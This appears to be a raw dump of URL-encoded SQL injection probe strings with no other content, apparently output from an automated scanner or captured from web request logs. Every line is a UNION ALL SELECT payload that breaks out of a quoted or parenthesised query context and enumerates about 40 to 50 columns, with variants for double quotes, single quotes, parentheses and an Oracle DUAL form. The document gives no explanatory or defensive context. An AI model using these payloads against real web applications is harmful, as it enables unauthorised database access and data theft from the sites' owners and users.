-7247%22%20UNION%20ALL%20SELECT%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%2C%204626%23%20AND%20%22kKqt%22%20LIKE%20%22kKqt -3560%22%20UNION%20ALL%20SELECT%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%23%20AND%20%22hSEt%22%20LIKE%20%22hSEt -1112%22%20UNION%20ALL%20SELECT%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%23%20AND%20%22RJHS%22%20LIKE%20%22RJHS -1383%22%20UNION%20ALL%20SELECT%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%2C%207050%23%20AND%20%22cxhO%22%20LIKE%20%22cxhO -5145%22%20UNION%20ALL%20SELECT%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%2C%203823%23%20AND%20%22WGXP%22%20LIKE%20%22WGXP -5356%22%20UNION%20ALL%20SELECT%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%2C%208770%23%20AND%20%22kHZO%22%20LIKE%20%22kHZO -8264%22%20UNION%20ALL%20SELECT%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%23%20AND%20%22AMiD%22%20LIKE%20%22AMiD -5178%29%20WHERE%203480%3D3480%20UNION%20ALL%20SELECT%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%23 -3338%29%20WHERE%209263%3D9263%20UNION%20ALL%20SELECT%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%2C%209263%23 -8167%29%20WHERE%201894%3D1894%20UNION%20ALL%20SELECT%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%2C%201894%23 -7316%29%20WHERE%205214%3D5214%20UNION%20ALL%20SELECT%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%23 -4215%29%20WHERE%205920%3D5920%20UNION%20ALL%20SELECT%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%23 -8182%29%20WHERE%209253%3D9253%20UNION%20ALL%20SELECT%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%23 -7313%29%20WHERE%209149%3D9149%20UNION%20ALL%20SELECT%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%2C%209149%23 -2470%29%20WHERE%208448%3D8448%20UNION%20ALL%20SELECT%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%2C%208448%23 -9925%29%20WHERE%208396%3D8396%20UNION%20ALL%20SELECT%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%23 -6146%29%20WHERE%209754%3D9754%20UNION%20ALL%20SELECT%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%2C%209754%23 -5755%27%29%20WHERE%204454%3D4454%20UNION%20ALL%20SELECT%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%23 -1305%27%29%20WHERE%204186%3D4186%20UNION%20ALL%20SELECT%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%23 -7936%27%29%20WHERE%206506%3D6506%20UNION%20ALL%20SELECT%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%23 -7479%27%29%20WHERE%201636%3D1636%20UNION%20ALL%20SELECT%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%2C%201636%23 -2228%27%29%20WHERE%209483%3D9483%20UNION%20ALL%20SELECT%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%23 -7064%27%29%20WHERE%206069%3D6069%20UNION%20ALL%20SELECT%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%23 -2135%27%29%20WHERE%209119%3D9119%20UNION%20ALL%20SELECT%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%23 -7388%27%29%20WHERE%205313%3D5313%20UNION%20ALL%20SELECT%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%2C%205313%23 -4208%27%29%20WHERE%206166%3D6166%20UNION%20ALL%20SELECT%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%23 -2374%27%29%20WHERE%208744%3D8744%20UNION%20ALL%20SELECT%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%2C%208744%23 -4909%27%20WHERE%206730%3D6730%20UNION%20ALL%20SELECT%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%2C%206730%23 -7228%27%20WHERE%207883%3D7883%20UNION%20ALL%20SELECT%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%2C%207883%23 -7782%27%20WHERE%201975%3D1975%20UNION%20ALL%20SELECT%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%23 -1708%27%20WHERE%209158%3D9158%20UNION%20ALL%20SELECT%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%23 -7217%27%20WHERE%205192%3D5192%20UNION%20ALL%20SELECT%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%2C%205192%23 -9686%27%20WHERE%209097%3D9097%20UNION%20ALL%20SELECT%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%23 -4387%27%20WHERE%207983%3D7983%20UNION%20ALL%20SELECT%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%23 -8149%27%20WHERE%205193%3D5193%20UNION%20ALL%20SELECT%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%2C%205193%23 -5282%27%20WHERE%203611%3D3611%20UNION%20ALL%20SELECT%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%23 -6864%27%20WHERE%203200%3D3200%20UNION%20ALL%20SELECT%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%23 -6642%22%20WHERE%206653%3D6653%20UNION%20ALL%20SELECT%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%2C%206653%23 -1893%22%20WHERE%202944%3D2944%20UNION%20ALL%20SELECT%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%23 -8406%22%20WHERE%208282%3D8282%20UNION%20ALL%20SELECT%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282%23 -3844%22%20WHERE%204370%3D4370%20UNION%20ALL%20SELECT%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%2C%204370%23 -8154%22%20WHERE%206104%3D6104%20UNION%20ALL%20SELECT%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%2C%206104%23 -3936%22%20WHERE%201950%3D1950%20UNION%20ALL%20SELECT%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%23 -9122%22%20WHERE%203047%3D3047%20UNION%20ALL%20SELECT%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%2C%203047%23 -4435%22%20WHERE%205156%3D5156%20UNION%20ALL%20SELECT%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%23 -7527%22%20WHERE%201584%3D1584%20UNION%20ALL%20SELECT%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%23 -1999%22%20WHERE%202120%3D2120%20UNION%20ALL%20SELECT%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%23 -2982%27%20%7C%7C%20%28SELECT%204249%20FROM%20DUAL%20WHERE%206689%3D6689%20UNION%20ALL%20SELECT%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%2C%206689%23%20%29%20%7C%7C%20%27 